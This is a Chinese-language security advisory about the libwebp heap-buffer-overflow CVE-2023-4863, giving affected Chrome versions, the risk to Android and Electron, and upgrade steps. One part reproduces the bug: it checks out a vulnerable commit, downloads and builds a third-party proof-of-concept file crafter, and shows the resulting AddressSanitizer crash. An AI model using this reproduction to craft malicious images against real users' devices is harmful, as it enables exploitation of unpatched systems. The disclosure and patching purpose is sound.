一、漏洞概述
WebP圖像編解碼庫libwebp存在堆緩沖區(qū)溢出漏洞(CVE-2023-4863),攻擊者可以通過發(fā)送植入惡意代碼的WebP圖像獲得設備的部分權限。
WebP是由Google開發(fā)的一種圖像格式,可為網(wǎng)絡圖像提供有損和無損壓縮。它旨在減小圖像的文件大小,同時不損失其視覺質量。Google Chrome是由Google開發(fā)的一款支持WebP圖像格式的網(wǎng)頁瀏覽器。
由于libwebp的使用范圍廣泛,不僅應用于各大瀏覽器,還包含在系統(tǒng)的底層庫中 (例如:Android),以及目前滿大街都是的Electron中無一例外均使用了libwebp 庫。請各位盡快更新瀏覽器及使用Electron技術的相關應用。
但CVE-2023-4863并未包含在Google即將在下月發(fā)布的10月安全更新之中 (一般 Google會提前半個月至一個月向合作廠商發(fā)布下月安全補丁,以便廠商能夠迅速修復漏洞),考慮到該漏洞已經(jīng)可能有野外利用的例子,Android設備目前相對而言還是比較危險的,不知Google后續(xù)是否有額外更新計劃來緊急修復該漏洞。否則按現(xiàn)有更新計劃,可能就要等到11月安全補丁才會修復了。
也希望Google能夠像之前爆出藍牙漏洞時那樣,為已經(jīng)停止支持的舊設備 (如 Pixel 4a) 提供計劃外安全更新。 補充:根據(jù)Mishaal Rahman老師的消息,Google有可能推出2023-10-06安全補丁等級來專門修復該漏洞,但若廠商無意更新,則還要遲至11月安全補丁才會修復。
# checkout webp $ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test $ cd webp_test/ # checkout vulnerable version $ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0 # enable AddressSanitizer $ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix # build webp $ make -f makefile.unix $ cd examples/ # fetch mistymntncop's proof-of-concept code $ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c # build and run proof-of-concept $ gcc -o craft craft.c $ ./craft bad.webp # test trigger file $ ./dwebp bad.webp -o test.png ================================================================= ==207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80 WRITE of size 1 at 0x626000002f28 thread T0 #0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) #1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7) #2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff) #3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5) #4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216) #5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b) #6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06) #7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026) #8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308 #9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d) 0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28) allocated by thread T0 here: #0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable ...
二、影響范圍
Google Chrome(Windows)版本 < 116.0.5845.187/.188
Google Chrome(Mac/Linux)版本 < 116.0.5845.187
三、安全措施3.1升級版本
目前該漏洞已經(jīng)修復,受影響用戶可升級到以下版本:
Google Chrome(Windows)版本 >=116.0.5845.187/.188
Google Chrome(Mac/Linux)版本 >=116.0.5845.187
四、下載地址
五、手動檢查更新可在Chrome 菜單-【幫助】-【關于 Google Chrome】檢查版本更新,并在更新完成后重新啟動。
![8ec71ef2-5b2f-11ee-939d-92fbcf53809c.png](https://file1.elecfans.com/web2/M00/A7/B9/wKgZomUQ51GAUdplAAENGSkfIbw623.png)
![8eda626e-5b2f-11ee-939d-92fbcf53809c.png](https://file1.elecfans.com/web2/M00/A7/B9/wKgZomUQ51GAYUKSAAFhw2QEtSQ601.png)
審核編輯:湯梓紅
-
Android
+關注
關注
12文章
3945瀏覽量
127980 -
Google
+關注
關注
5文章
1772瀏覽量
57822 -
代碼
+關注
關注
30文章
4830瀏覽量
69094
原文標題:WebP圖像編解碼庫libwebp存在堆緩沖區(qū)溢出漏洞(升級Google Chrome瀏覽器為最新版本)
文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關注!文章轉載請注明出處。
發(fā)布評論請先 登錄
相關推薦
緩沖區(qū)溢出的危害及避免緩沖區(qū)溢出的三種方法
緩沖區(qū)溢出的危害及避免緩沖區(qū)溢出的三種方法
緩沖區(qū)溢出攻擊模式及其防御的研究
基于中間匯編的緩沖區(qū)溢出檢測模型
基于狀態(tài)圖的緩沖區(qū)溢出攻擊分析
二進制環(huán)境下的緩沖區(qū)溢出漏洞動態(tài)檢測
基于可執(zhí)行代碼的緩沖區(qū)溢出檢測模型
二進制掃描的緩沖區(qū)溢出漏洞探測技術
Windows緩沖區(qū)溢出攻擊的實例研究
緩沖區(qū)溢出攻擊的防護技術分析
緩沖區(qū)溢出攻擊的原理和防范技術分析
為什么緩沖區(qū)溢出會帶來危害?會帶來哪些危害?
![為什么<b class='flag-5'>緩沖區(qū)</b><b class='flag-5'>溢出</b>會帶來危害?會帶來哪些危害?](https://file1.elecfans.com//web2/M00/A6/F9/wKgZomUMQY6ANGlaAAAtYObODnI254.png)
消除IoT上的緩沖區(qū)溢出漏洞
![消除IoT上的<b class='flag-5'>緩沖區(qū)</b><b class='flag-5'>溢出</b><b class='flag-5'>漏洞</b>](https://file.elecfans.com/web2/M00/6F/81/poYBAGNGa-OAIYw2AAEKYw0JLKw334.png)
評論